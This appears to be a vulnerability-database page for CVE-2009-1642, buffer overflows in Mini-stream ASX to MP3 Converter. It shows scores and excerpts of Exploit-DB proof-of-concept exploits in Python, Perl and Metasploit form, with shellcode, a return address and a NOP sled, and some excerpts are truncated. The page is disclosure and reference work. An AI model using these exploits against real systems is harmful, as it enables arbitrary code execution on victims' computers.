CVE-2009-1642
published 2009-05-15CVE-2009-1642: Multiple stack-based buffer overflows in Mini-stream ASX to MP3 Converter 3.0.0.7 allow remote attackers to execute arbitrary code via (1) a long rtsp URL in a…
PriorityP345critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.86%
93.2th percentile
Multiple stack-based buffer overflows in Mini-stream ASX to MP3 Converter 3.0.0.7 allow remote attackers to execute arbitrary code via (1) a long rtsp URL in a .ram file and (2) a long string in the HREF attribute of a REF element in a .asx file. NOTE: the latter was also subsequently reported in "prior to 3.1.3.7."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | mini-stream_to_mp3_converter | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Shadow Stream Recorder 3.0.1.7 - Local Buffer Overflow (Metasploit)
exploitdb·2012-04-25
CVE-2009-1642 Shadow Stream Recorder 3.0.1.7 - Local Buffer Overflow (Metasploit)
Shadow Stream Recorder 3.0.1.7 - Local Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Shadow Stream Recorder 3.0.1.7 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.
Using the application to open a specially crafted asx file, a buffer
overflow may occur to allow arbitrary code execution under the context
of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AlpHaNiX ', # Original .m3u exploit
'b0telh0 ' # MSF Module and .asx exploit
],
'Referenc
Exploit-DB
ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow
exploitdb·2010-03-30
CVE-2009-1642 ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow
ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow
---
#!/usr/bin/python
import time
# ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit
# Author: Hazem Mofeed
# PoC: http://www.exploit-db.com/exploits/11930
# Tested On: Windows Xp Home Edition SP3
# Home: http://hakxer.wordpress.com
print ' Exploited by Hazem Mofeed \n'
print ' ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit \n'
print ' building exploit ..........'
time.sleep(3)
shellcode = ("\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65")
ret = "\x08\x6A\x83\x7C"
null = "\x90" * 10
exploit = ("http://" + "\x41" * 26117 + ret + null + shellcode )
try:
file = open("exploit.asx",
Exploit-DB
Shadow Stream Recorder 3.0.1.7 - '.asx' Local Buffer Overflow
exploitdb·2010-03-30
CVE-2009-1642 Shadow Stream Recorder 3.0.1.7 - '.asx' Local Buffer Overflow
Shadow Stream Recorder 3.0.1.7 - '.asx' Local Buffer Overflow
---
#!/usr/bin/python
#
# Title: Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
# Date: 03-29-2010
# Author: b0telh0
# Link: http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
# Tested on: Windows XP SP3
#
# windows/exec - 228 bytes
# EXITFUNC=seh, CMD=calc.exe
#
shellcode = ("\xda\xd6\xbe\xc4\x14\x6b\x17\x31\xc9\xd9\x74\x24\xf4\x58\xb1"
"\x33\x83\xe8\xfc\x31\x70\x14\x03\x70\xd0\xf6\x9e\xeb\x30\x7f"
"\x60\x14\xc0\xe0\xe8\xf1\xf1\x32\x8e\x72\xa3\x82\xc4\xd7\x4f"
"\x68\x88\xc3\xc4\x1c\x05\xe3\x6d\xaa\x73\xca\x6e\x1a\xbc\x80"
"\xac\x3c\x40\xdb\xe0\x9e\x79\x14\xf5\xdf\xbe\x49\xf5\xb2\x17"
"\x05\xa7\x22\x13\x5b\x7b\x42\xf3\xd7\xc3\x3c\x76\x27\xb7\xf6"
"\x79\x78\x67\x8c\x32\x60\x0c\xca\xe2\x91\xc1\x08\xde\xd8\x6e
Exploit-DB
ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow (PoC)
exploitdb·2010-03-29
CVE-2009-1642 ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow (PoC)
ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow (PoC)
---
#!/usr/bin/perl
# ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC
# Exploited By mat
#
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333ED8
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414141
###################################################################
my $ex="http://"."\x41" x 26121;
###################################################################
open(MYFILE,'>>mat.asx'); # (.smi) (.smil) (.wpl) (.wax)
print MYFILE $ex;
close(MYFILE);
###################################################################
Exploit-DB
Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow
exploitdb·2009-05-07
CVE-2009-1642 Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow
Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow
---
#!/usr/bin/perl
=gnk
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\...From Iran
Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit
[»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....
[»] Website:............[ http://mini-stream.net/ ].....................
[»] Today:..............[ 07052009 ]....................................
[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]........
Exploit-DB
Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow
exploitdb·2009-05-07
CVE-2009-1642 Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow
Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow
---
#!/usr/bin/perl
=gnk
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\...From Iran
Mini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit
[»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....
[»] Website:............[ http://mini-stream.net/ ].....................
[»] Today:..............[ 07052009 ]....................................
[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmai
No writeups or analysis indexed.
http://www.securityfocus.com/bid/34860http://www.securityfocus.com/bid/34864https://exchange.xforce.ibmcloud.com/vulnerabilities/50374https://packetstormsecurity.com/files/144558/ASX-To-MP3-Converter-Stack-Overflow.htmlhttps://www.exploit-db.com/exploits/8629https://www.exploit-db.com/exploits/8630http://www.securityfocus.com/bid/34860http://www.securityfocus.com/bid/34864https://exchange.xforce.ibmcloud.com/vulnerabilities/50374https://packetstormsecurity.com/files/144558/ASX-To-MP3-Converter-Stack-Overflow.htmlhttps://www.exploit-db.com/exploits/8629https://www.exploit-db.com/exploits/8630
2009-05-15
Published